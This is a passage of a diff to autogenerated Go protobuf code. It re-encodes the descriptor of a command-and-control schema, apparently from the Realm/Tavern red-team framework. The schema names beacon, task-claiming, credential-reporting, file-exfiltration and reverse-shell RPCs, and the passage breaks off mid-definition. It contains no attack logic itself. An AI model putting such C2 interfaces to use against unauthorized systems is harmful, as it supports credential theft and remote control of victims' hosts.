0x2e, 0x63, 0x32, 0x2e, 0x42, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x2e, 0x54, 0x72, 0x61, 0x6e, - 0x73, 0x70, 0x6f, 0x72, 0x74, 0x52, 0x09, 0x74, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, - 0x22, 0x4f, 0x0a, 0x09, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x12, 0x19, 0x0a, - 0x15, 0x54, 0x52, 0x41, 0x4e, 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, - 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x12, 0x0a, 0x0e, 0x54, 0x52, 0x41, 0x4e, - 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x47, 0x52, 0x50, 0x43, 0x10, 0x01, 0x12, 0x13, 0x0a, 0x0f, - 0x54, 0x52, 0x41, 0x4e, 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x48, 0x54, 0x54, 0x50, 0x31, 0x10, - 0x02, 0x22, 0xfe, 0x01, 0x0a, 0x04, 0x48, 0x6f, 0x73, 0x74, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, - 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, - 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, - 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x2d, - 0x0a, 0x08, 0x70, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0e, - 0x32, 0x11, 0x2e, 0x63, 0x32, 0x2e, 0x48, 0x6f, 0x73, 0x74, 0x2e, 0x50, 0x6c, 0x61, 0x74, 0x66, - 0x6f, 0x72, 0x6d, 0x52, 0x08, 0x70, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x12, 0x1d, 0x0a, - 0x0a, 0x70, 0x72, 0x69, 0x6d, 0x61, 0x72, 0x79, 0x5f, 0x69, 0x70, 0x18, 0x04, 0x20, 0x01, 0x28, - 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6d, 0x61, 0x72, 0x79, 0x49, 0x70, 0x22, 0x74, 0x0a, 0x08, - 0x50, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x12, 0x18, 0x0a, 0x14, 0x50, 0x4c, 0x41, 0x54, - 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, - 0x10, 0x00, 0x12, 0x14, 0x0a, 0x10, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x57, - 0x49, 0x4e, 0x44, 0x4f, 0x57, 0x53, 0x10, 0x01, 0x12, 0x12, 0x0a, 0x0e, 0x50, 0x4c, 0x41, 0x54, - 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4c, 0x49, 0x4e, 0x55, 0x58, 0x10, 0x02, 0x12, 0x12, 0x0a, 0x0e, - 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4d, 0x41, 0x43, 0x4f, 0x53, 0x10, 0x03, - 0x12, 0x10, 0x0a, 0x0c, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x42, 0x53, 0x44, - 0x10, 0x04, 0x22, 0x59, 0x0a, 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, - 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x22, 0x0a, 0x04, 0x74, 0x6f, - 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, - 0x74, 0x63, 0x68, 0x2e, 0x54, 0x6f, 0x6d, 0x65, 0x52, 0x04, 0x74, 0x6f, 0x6d, 0x65, 0x12, 0x1d, - 0x0a, 0x0a, 0x71, 0x75, 0x65, 0x73, 0x74, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x09, 0x71, 0x75, 0x65, 0x73, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0x1d, 0x0a, - 0x09, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x10, 0x0a, 0x03, 0x6d, 0x73, - 0x67, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6d, 0x73, 0x67, 0x22, 0xe3, 0x01, 0x0a, - 0x0a, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x0e, 0x0a, 0x02, 0x69, - 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x16, 0x0a, 0x06, 0x6f, - 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x6f, 0x75, 0x74, - 0x70, 0x75, 0x74, 0x12, 0x23, 0x0a, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x18, 0x03, 0x20, 0x01, - 0x28, 0x0b, 0x32, 0x0d, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, - 0x72, 0x52, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x42, 0x0a, 0x0f, 0x65, 0x78, 0x65, 0x63, - 0x5f, 0x73, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x61, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, - 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, - 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x52, 0x0d, 0x65, - 0x78, 0x65, 0x63, 0x53, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x41, 0x74, 0x12, 0x44, 0x0a, 0x10, - 0x65, 0x78, 0x65, 0x63, 0x5f, 0x66, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, 0x5f, 0x61, 0x74, - 0x18, 0x05, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, - 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, - 0x6d, 0x70, 0x52, 0x0e, 0x65, 0x78, 0x65, 0x63, 0x46, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, - 0x41, 0x74, 0x22, 0x37, 0x0a, 0x11, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, - 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x22, 0x0a, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, - 0x6e, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0a, 0x2e, 0x63, 0x32, 0x2e, 0x42, 0x65, 0x61, - 0x63, 0x6f, 0x6e, 0x52, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x22, 0x34, 0x0a, 0x12, 0x43, - 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, - 0x65, 0x12, 0x1e, 0x0a, 0x05, 0x74, 0x61, 0x73, 0x6b, 0x73, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, - 0x32, 0x08, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x52, 0x05, 0x74, 0x61, 0x73, 0x6b, - 0x73, 0x22, 0x27, 0x0a, 0x11, 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, - 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x01, - 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x22, 0x2a, 0x0a, 0x12, 0x46, 0x65, - 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, - 0x12, 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0c, 0x52, - 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0x68, 0x0a, 0x17, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, - 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x34, 0x0a, 0x0a, 0x63, 0x72, - 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x14, - 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, - 0x74, 0x69, 0x61, 0x6c, 0x52, 0x0a, 0x63, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, - 0x22, 0x1a, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, - 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x52, 0x0a, 0x11, - 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, - 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x24, 0x0a, 0x05, 0x63, 0x68, - 0x75, 0x6e, 0x6b, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, - 0x69, 0x74, 0x63, 0x68, 0x2e, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, - 0x22, 0x14, 0x0a, 0x12, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, - 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x5e, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, - 0x73, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, - 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x29, 0x0a, 0x04, 0x6c, - 0x69, 0x73, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x65, 0x6c, 0x64, 0x72, - 0x69, 0x74, 0x63, 0x68, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, - 0x52, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x22, 0x1b, 0x0a, 0x19, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, - 0x6e, 0x73, 0x65, 0x22, 0x41, 0x0a, 0x17, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, - 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x26, - 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, - 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x06, - 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x22, 0x1a, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, - 0x73, 0x65, 0x22, 0x73, 0x0a, 0x13, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, - 0x6c, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x2f, 0x0a, 0x04, 0x6b, 0x69, 0x6e, - 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, - 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, - 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, - 0x74, 0x61, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, 0x64, 0x61, 0x74, 0x61, 0x12, 0x17, - 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x03, 0x20, 0x01, 0x28, 0x03, 0x52, - 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x22, 0x5b, 0x0a, 0x14, 0x52, 0x65, 0x76, 0x65, 0x72, - 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, - 0x2f, 0x0a, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x1b, 0x2e, - 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, - 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, 0x6e, 0x64, - 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, 0x74, 0x61, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, - 0x64, 0x61, 0x74, 0x61, 0x2a, 0x8f, 0x01, 0x0a, 0x17, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, - 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x4b, 0x69, 0x6e, 0x64, - 0x12, 0x2a, 0x0a, 0x26, 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, 0x4c, - 0x4c, 0x5f, 0x4d, 0x45, 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x55, - 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x23, 0x0a, 0x1f, - 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, 0x4c, 0x4c, 0x5f, 0x4d, 0x45, - 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x44, 0x41, 0x54, 0x41, 0x10, - 0x01, 0x12, 0x23, 0x0a, 0x1f, 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, - 0x4c, 0x4c, 0x5f, 0x4d, 0x45, 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, - 0x50, 0x49, 0x4e, 0x47, 0x10, 0x02, 0x32, 0xfc, 0x03, 0x0a, 0x02, 0x43, 0x32, 0x12, 0x3d, 0x0a, - 0x0a, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x12, 0x15, 0x2e, 0x63, 0x32, - 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x71, 0x75, 0x65, - 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, - 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x12, 0x3d, 0x0a, 0x0a, - 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, - 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, - 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x30, 0x01, 0x12, 0x4d, 0x0a, 0x10, 0x52, - 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x12, - 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, - 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, - 0x61, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x3d, 0x0a, 0x0a, 0x52, 0x65, - 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, - 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, - 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, - 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x28, 0x01, 0x12, 0x50, 0x0a, 0x11, 0x52, 0x65, 0x70, - 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x1c, - 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, - 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1d, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, - 0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x4f, 0x0a, 0x10, 0x52, - 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, - 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, - 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, - 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x12, 0x47, 0x0a, 0x0c, - 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x12, 0x17, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, - 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x18, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, - 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, - 0x00, 0x28, 0x01, 0x30, 0x01, 0x42, 0x23, 0x5a, 0x21, 0x72, 0x65, 0x61, 0x6c, 0x6d, 0x2e, 0x70, - 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, 0x6e, 0x2f, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x6e, - 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x63, 0x32, 0x70, 0x62, 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, - 0x6f, 0x33, -}) +const file_c2_proto_rawDesc = "" + + "\n" + + "\bc2.proto\x12\x02c2\x1a\x1fgoogle/protobuf/timestamp.proto\x1a\x0eeldritch.proto\"'\n" + + "\x05Agent\x12\x1e\n" + + "\n" + + "identifier\x18\x01 \x01(\tR\n" + + "identifier\"\xb9\x02\n" + + "\x06Beacon\x12\x1e\n" + + "\n" + + "identifier\x18\x01 \x01(\tR\n" + + "identifier\x12\x1c\n" + + "\tprincipal\x18\x02 \x01(\tR\tprincipal\x12\x1c\n" + + "\x04host\x18\x03 \x01(\v2\b.c2.HostR\x04host\x12\x1f\n" + + "\x05agent\x18\x04 \x01(\v2\t.c2.AgentR\x05agent\x12\x1a\n" + + "\binterval\x18\x05 \x01(\x04R\binterval\x122\n" + + "\ttransport\x18\x06 \x01(\x0e2\x14.c2.Beacon.TransportR\ttransport\"b\n" + + "\tTransport\x12\x19\n" + + "\x15TRANSPORT_UNSPECIFIED\x10\x00\x12\x12\n" + + "\x0eTRANSPORT_GRPC\x10\x01\x12\x13\n" + + "\x0fTRANSPORT_HTTP1\x10\x02\x12\x11\n" + + "\rTRANSPORT_DNS\x10\x03\"\xfe\x01\n" + + "\x04Host\x12\x1e\n" + + "\n" + + "identifier\x18\x01 \x01(\tR\n" + + "identifier\x12\x12\n" + + "\x04name\x18\x02 \x01(\tR\x04name\x12-\n" + + "\bplatform\x18\x03 \x01(\x0e2\x11.c2.Host.PlatformR\bplatform\x12\x1d\n" + + "\n" + + "primary_ip\x18\x04 \x01(\tR\tprimaryIp\"t\n" + + "\bPlatform\x12\x18\n" + + "\x14PLATFORM_UNSPECIFIED\x10\x00\x12\x14\n" + + "\x10PLATFORM_WINDOWS\x10\x01\x12\x12\n" + + "\x0ePLATFORM_LINUX\x10\x02\x12\x12\n" + + "\x0ePLATFORM_MACOS\x10\x03\x12\x10\n" + + "\fPLATFORM_BSD\x10\x04\"Y\n" + + "\x04Task\x12\x0e\n" + + "\x02id\x18\x01 \x01(\x03R\x02id\x12\"\n" + + "\x04tome\x18\x02 \x01(\v2\x0e.eldritch.TomeR\x04tome\x12\x1d\n" + + "\n" + + "quest_name\x18\x03 \x01(\tR\tquestName\"\x1d\n" + + "\tTaskError\x12\x10\n" + + "\x03msg\x18\x01 \x01(\tR\x03msg\"\xe3\x01\n" + + "\n" + + "TaskOutput\x12\x0e\n" + + "\x02id\x18\x01 \x01(\x03R\x02id\x12\x16\n" + + "\x06output\x18\x02 \x01(\tR\x06output\x12#\n" + + "\x05error\x18\x03 \x01(\v2\r.c2.TaskErrorR\x05error\x12B\n" + + "\x0fexec_started_at\x18\x04 \x01(\v2\x1a.google.protobuf.TimestampR\rexecStartedAt\x12D\n" + + "\x10exec_finished_at\x18\x05 \x01(\v2\x1a.google.protobuf.TimestampR\x0eexecFinishedAt\"7\n" + + "\x11ClaimTasksRequest\x12\"\n" + + "\x06beacon\x18\x01 \x01(\v2\n" + + ".c2.BeaconR\x06beacon\"4\n" + + "\x12ClaimTasksResponse\x12\x1e\n" + + "\x05tasks\x18\x01 \x03(\v2\b.c2.TaskR\x05tasks\"'\n" + + "\x11FetchAssetRequest\x12\x12\n" + + "\x04name\x18\x01 \x01(\tR\x04name\"*\n" + + "\x12FetchAssetResponse\x12\x14\n" + + "\x05chunk\x18\x01 \x01(\fR\x05chunk\"h\n" + + "\x17ReportCredentialRequest\x12\x17\n" + + "\atask_id\x18\x01 \x01(\x03R\x06taskId\x124\n" + + "\n" + + "credential\x18\x02 \x01(\v2\x14.eldritch.CredentialR\n" + + "credential\"\x1a\n" + + "\x18ReportCredentialResponse\"R\n" + + "\x11ReportFileRequest\x12\x17\n" + + "\atask_id\x18\x01 \x01(\x03R\x06taskId\x12$\n" + + "\x05chunk\x18\x02 \x01(\v2\x0e.eldritch.FileR\x05chunk\"\x14\n" + + "\x12ReportFileResponse\"^\n" + + "\x18ReportProcessListRequest\x12\x17\n" + + "\atask_id\x18\x01 \x01(\x03R\x06taskId\x12)\n" + + "\x04list\x18\x02 \x01(\v2\x15.eldritch.ProcessListR\x04list\"\x1b\n" + + "\x19ReportProcessListResponse\"A\n" + + "\x17ReportTaskOutputRequest\x12&\n" + + "\x06output\x18\x01 \x01(\v2\x0e.c2.TaskOutputR\x06output\"\x1a\n" + + "\x18ReportTaskOutputResponse\"s\n" + + "\x13ReverseShellRequest\x12/\n" + + "\x04kind\x18\x01 \x01(\x0e2\x1b.c2.ReverseShellMessageKindR\x04kind\x12\x12\n" + + "\x04data\x18\x02 \x01(\fR\x04data\x12\x17\n" + + "\atask_id\x18\x03 \x01(\x03R\x06taskId\"[\n" + + "\x14ReverseShellResponse\x12/\n" + + "\x04kind\x18\x01 \x01(\x0e2\x1b.c2.ReverseShellMessageKindR\x04kind\x12\x12\n" + + "\x04data\x18\x02 \x01(\fR\x04data*\x8f\x01\n" + + "\x17ReverseShellMessageKind\x12*\n" + + "&REVERSE_SHELL_MESSAGE_KIND_UNSPECIFIED\x10\x00\x12#\n" + + "\x1fREVERSE_SHELL_MESSAGE_KIND_DATA\x10\x01\x12#\n" + + "\x1fREVERSE_SHELL_MESSAGE_KIND_PING\x10\x022\xfc\x03\n" + + "\x02C2\x12=\n" + + "\n" + + "ClaimTasks\x12\x15.c2.ClaimTasksRequest\x1a\x16.c2.ClaimTasksResponse\"\x00\x12=\n" + + "\n" + + "FetchAsset\x12\x15.c2.FetchAssetRequest\x1a\x16.c2.FetchAssetResponse0\x01\x12M\n" + + "\x10ReportCredential\x12\x1b.c2.ReportCredentialRequest\x1a\x1c.c2.ReportCredentialResponse\x12=\n" + + "\n" + + 